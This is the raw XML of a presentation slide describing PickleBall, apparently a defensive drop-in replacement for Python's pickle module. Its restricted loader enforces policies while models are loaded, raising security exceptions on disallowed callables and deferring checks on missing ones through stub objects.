<file path=ppt/slides/slide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1259" name="Shape 1259"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p100"/>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1262" name="Google Shape;1262;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902825" y="2252725"/>
            <a:ext cx="1590300" cy="2119500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8775">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="83975" lIns="83975" spcFirstLastPara="1" rIns="83975" wrap="square" tIns="83975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1263" name="Google Shape;1263;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992928"/>
            <a:ext cx="630600" cy="606300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19125">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91625" lIns="91625" spcFirstLastPara="1" rIns="91625" wrap="square" tIns="91625">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1402"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1264" name="Google Shape;1264;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992927"/>
            <a:ext cx="630405" cy="606068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1265" name="Google Shape;1265;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177425" y="3710825"/>
            <a:ext cx="1092000" cy="615000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p100"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320625" y="4018325"/>
            <a:ext cx="1590300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p100"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="2338825"/>
            <a:ext cx="1679100" cy="688800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213671" y="1800712"/>
            <a:ext cx="563087" cy="525483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p100"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546349" y="3141134"/>
            <a:ext cx="688200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221788" y="2252722"/>
            <a:ext cx="1092000" cy="603600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1271" name="Google Shape;1271;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="1454725"/>
            <a:ext cx="1426500" cy="434700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1272" name="Google Shape;1272;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516368" y="2980667"/>
            <a:ext cx="502800" cy="407400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1323">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="1323">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="Google Shape;1273;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164559" y="3460128"/>
            <a:ext cx="1206300" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="5531050"/>
            <a:ext cx="3911100" cy="2955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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>drop-in replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> for the pickle module. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Raises security exceptions when opcodes import or invoke disallowed callables.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall loads policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for missing but unimportant callables. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>When a missing callable is imported, PickleBall creates a stub object and defers raising a security exception until the stub object is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>some attributes are added to the model as metadata after instantiation. If these are not used during deserialization or inference, they do not need to be instantiated.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="Google Shape;1275;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="838675"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforcement module is a modified Pickle Machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="1513850"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforces policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
